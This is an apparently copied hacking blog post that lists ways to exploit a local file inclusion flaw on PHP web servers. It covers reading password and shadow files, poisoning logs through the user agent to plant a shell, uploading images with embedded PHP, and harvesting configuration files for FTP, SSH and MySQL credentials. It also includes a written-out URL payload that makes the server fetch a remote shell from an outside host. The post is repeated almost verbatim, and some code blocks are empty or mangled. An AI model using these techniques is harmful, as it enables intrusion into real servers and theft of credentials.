What you can use LFI for???
Allright, so i got this question often... Some guy got a LFI vuln some place but, what the fuck do i use it for?
Well, there is a few things you can do with it..
1. If /etc/passwd contains the user password on the system you can use ssh(assuming they got ssh and uses the users on the system as login) or if someone is a fucking idiot and make /etc/shadow readeble for anyone if /etc/passwd is just x'ed out... If on windows machine maybe you can include the SAM file? dunno..
2. You can try to include the error or access log and then telnet to the server and make it write php code to error or access log that way you can get a shell! Also if error eller access logg loggs user agent or other shit you can just browse the page with php in the useragent then include it
3. If its a shared host or a server with more pages on it you can try to find upload forms etc etc on the other pages hosted on the same server, then make a image containing php code inside it, then include it from the page you want to hack, that way getting shell access! You can ofc do this on the same domain to, if it got some kindof upload form, and it dosent need to be images, can be documents or pdf's, anything!
4. Finding config or other interesting files... Many idiots store their ftp and or ssh info in .txt or doc files outside the www dir, but if you got LFI you can include those anyway! Takes a bit time trying out file names and shit trouth xD Also .config files or config.php files can contain things like root mysqld info and that can lead to more interesting stuff! Also, maybe a page got a basic login system with reading from a config.php so you can get admin access on the page..
5. if its site and forum you can upload image with aribitary code then include and execute it..
6. You even can make it vnl to LFI
Code:
then
Code:
and the shell will be up like this
Code:
7. or u can do something like this ..
if proc/self/environ is accessible you can
Code:
zero.php is the shell and the server will download
Code:
and it will save it as zero.php and u will get something like this
Code:
reference:cyberterrorist
Well, there is a few things you can do with it..
1. If /etc/passwd contains the user password on the system you can use ssh(assuming they got ssh and uses the users on the system as login) or if someone is a fucking idiot and make /etc/shadow readeble for anyone if /etc/passwd is just x'ed out... If on windows machine maybe you can include the SAM file? dunno..
2. You can try to include the error or access log and then telnet to the server and make it write php code to error or access log that way you can get a shell! Also if error eller access logg loggs user agent or other shit you can just browse the page with php in the useragent then include it
3. If its a shared host or a server with more pages on it you can try to find upload forms etc etc on the other pages hosted on the same server, then make a image containing php code inside it, then include it from the page you want to hack, that way getting shell access! You can ofc do this on the same domain to, if it got some kindof upload form, and it dosent need to be images, can be documents or pdf's, anything!
4. Finding config or other interesting files... Many idiots store their ftp and or ssh info in .txt or doc files outside the www dir, but if you got LFI you can include those anyway! Takes a bit time trying out file names and shit trouth xD Also .config files or config.php files can contain things like root mysqld info and that can lead to more interesting stuff! Also, maybe a page got a basic login system with reading from a config.php so you can get admin access on the page..
5. if its site and forum you can upload image with aribitary code then include and execute it..
6. You even can make it vnl to LFI
Code:
then
Code:
http://anything.org/index.php?action=../proc/self/environ?cmd=curlhttp://zero-thunder.com/mu.txt -o zero.php
and the shell will be up like this
Code:
http://anything.org/zero.php
7. or u can do something like this ..
if proc/self/environ is accessible you can
Code:
zero.php is the shell and the server will download
Code:
http://zero-thunder.com/mu.txt
and it will save it as zero.php and u will get something like this
Code:
http://anything.org/zero.php
reference:cyberterrorist
0 komentar: